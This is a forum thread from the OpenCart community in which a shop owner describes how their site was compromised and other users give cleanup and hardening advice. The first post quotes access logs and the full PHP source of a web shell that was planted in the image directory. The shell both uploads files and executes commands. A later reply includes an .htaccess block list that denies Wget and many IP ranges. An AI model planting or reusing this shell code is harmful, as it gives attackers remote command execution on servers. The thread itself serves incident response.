OpenCart Community

OpenCart Community Forum - Discuss shopping cart and e-commerce solutions.
https://forum.opencart.com/

Server exploited last night, any help appreciated

https://forum.opencart.com/viewtopic.php?t=184105

Page 1 of 1

Server exploited last night, any help appreciated

Posted: Fri May 12, 2017 3:47 am
by stinn
Last night it appears that an IP from Europe began to attack my OC2.3.0.2 install. It appears they may have accessed the admin side the admin password has been changed.
The next standout from the logs is a file called index.php showing up in the images directory:

Code: Select all

94.242.252.39 - - [11/May/2017:00:59:49 -0400] "GET /image/data/atlarge/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
This file contained an uploader, that looks like this:

Code: Select all

<?php
if(@$_REQUEST["id"]== 'jj')
{
$files = @$_FILES["files"];
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>shell</a></h1>";
}
}
exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}
if(@$_REQUEST["id"]== 'pp')
{
system($_GET["cmd"]);
}
?>
There is then a post to this

Code: Select all

94.242.252.39 - - [11/May/2017:01:00:08 -0400] "POST /image/data/atlarge/index.php?id=jj HTTP/1.1" 200 190 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
Which seems to have created web.php as we start to see hits to that now

Code: Select all

94.242.252.39 - - [11/May/2017:01:00:14 -0400] "GET /image/data/atlarge/web.php HTTP/1.1" 200 40459 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=smiley HTTP/1.1" 200 92 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=folder HTTP/1.1" 200 90 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=file HTTP/1.1" 200 93 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
web.php file is nowhere to be found on the server. The first thing I noticed this morning was that the site was not working, the front end was throwing 500 errors, the backend was working normally. I found that a large number of files had been deleted, before I realized there was an exploit, and re-uploading from a fresh download + journal theme upload seemed to get the site up and running.
However that's when I started combing throught the logs and found all this and put the site in maintenance mode. Any advice on how to get the site up and running securely again? I'm thinking obviously fresh file install, what's the best way to do that with the database? Can I just dump the fresh download and replace the config files? This clearly attacked my images dir but I need those, I've searched through the directory and find no more .php files in it.

Thanks in advance for any advice or guidance.

Re: Server exploited last night, any help appreciated

Posted: Fri May 12, 2017 7:37 am
by IP_CAM
well, one would have to find out first on how they got in, in the first place. And for this, your Server Setup and Logs,
to some time back, would have to be screened, as well as your Shop Installation, Files, Extensions, and Settings,
because they must have found a way in.

Or then, your own Software has sent them the Key, but such could only happen, if the Key would already have been
part of the Software, and this can only happen, if one installed a Theme from the wrong Lower East Site of the web ::)
---
And if you use a Journal Theme Extension, you should upgrade, they just had some problems, a short while ago... ;)
I would get a DB Content Copy, to check on it, and delete/remove the existing Shop Directory, in FULL, to later
CREATE a new one. Then start again from upload + install, until everything works, and then, restore existing data,
after the DB-Screen, back to it's DB Place.

Good Luck !
Ernie

Re: Server exploited last night, any help appreciated

Posted: Fri May 12, 2017 7:40 am
by stinn
I was running an old version of journal and I wonder if that's what did it they seemed to be hitting some journal js files. I have fully updated it now and fresh installed all files only reusing images after going through all folders to ensure no shenanigans.

Re: Server exploited last night, any help appreciated

Posted: Fri May 12, 2017 7:40 pm
by ADD Creative
There has been a recent exploit with the Journal Theme. See viewtopic.php?f=179&t=183812. The last post suggested they have released a patch.

I would recommend you change the passwords to all the OpenCart admin accounts and to all FTP accounts. Remove all the PHP files from your image directory.

I would compare the files on your server with a clean install downloads for the OpenCart site to see if any changes have been made. Download the files and use a file comparison program to compare.

I would also look through the web logs and the FTP logs to see if you can work out how the /image/data/atlarge/index.php got on your server. Search for if in your logs or any other access from the same IP.

Re: Server exploited last night, any help appreciated

Posted: Fri May 12, 2017 10:39 pm
by stinn
Passwords have all been changed. I completely replaced my html folder with a fresh download from the site, then copied the newest journal theme, then fresh downloaded all my extensions. The only files I moved from my older folder were images and that was after explicitly looking through all the folders for any php files. I'm fairly confident I'm clean now.
I'm going to continue to search through the logs to see if I can track down how or when that file was created but nothing stood out yesterday. It's also possible it happened a while ago and I'll need to go back in older logs.

Re: Server exploited last night, any help appreciated

Posted: Sat May 13, 2017 12:17 am
by IP_CAM
And just, to round this up, and under the aspect, that my Servers momentarely get 'bombed'
on a daily scale, some of them also looking for Magento related leaks and holes. And in some
Countries, even Hospitals are out of order, because of the present attacks, all over the place.
---
My favoured Tool to check on IP's:
https://www.gaijin.at/en/dlet.php
---
Whoever is not required, to leave a Site 'open' for anyone, could always restrict access in a 'global'
way, by use of a SITE ROOT .htaccess, to deny entire Ranges, instead of (changing) IP-Adresses
only, from those, trying to sneak in the wrong way, or do bad things.
It's one of those steps, hopefully adding a little to security...
Ernie

PS: On my commercial Clubs Sites, this list already contains 1140 such entries, out of a total
of 1819 htaccess Lines, after beeing in service for well over a decade, it was the only way,
to keep it clean. ;) Still, it had no negative effect on any page load Test Result.
---
my latest List of denials, just re-updated, attempted WP Hacks, saturday 0400:

Code: Select all

Options +SymLinksIfOwnerMatch
SetEnvIfNoCase User-Agent "^Wget" bad_bot
<Limit GET POST>
   Order Allow,Deny
   Allow from all
   Deny from env=bad_bot
</Limit>
# Prevent Directory listing 
Options -Indexes
<Files *>
order allow,deny
allow from all
deny from 5.77.34.
deny from 37.59.
deny from 37.128.
deny from 46.161.
deny from 46.229.
deny from 47.90.
deny from 50.63.
deny from 51.255.
deny from 63.243.
deny from 66.148.
deny from 69.49.
deny from 77.244.
deny from 80.82.
deny from 80.92.
deny from 80.190.
deny from 83.18.
deny from 88.76.
deny from 88.86.
deny from 91.121.
deny from 92.
deny from 93.104.
deny from 94.23.
deny from 94.177.
deny from 94.242.
deny from 98.124.
deny from 98.130. 
deny from 98.131.
deny from 103.27.
deny from 108.167.
deny from 113.10.
deny from 125.
deny from 141.105.
deny from 145.87.
deny from 148.251.
deny from 149.56.
deny from 149.202.
deny from 149.255.
deny from 151.13.
deny from 163.172.
deny from 164.132.
deny from 168.144.
deny from 174.37.
deny from 178.250.
deny from 180.76.
deny from 182.50.
deny from 184.168.
deny from 184.172.
deny from 185.147.
deny from 188.234.
deny from 198.1.
deny from 198.2.
deny from 198.12.
deny from 200.9.
deny from 200.21.
deny from 200.75.
deny from 202.46.
deny from 203.124.
deny from 204.93.
deny from 213.251.
deny from 216.244.
deny from 217.28.
</Files>
All times are UTC+08:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/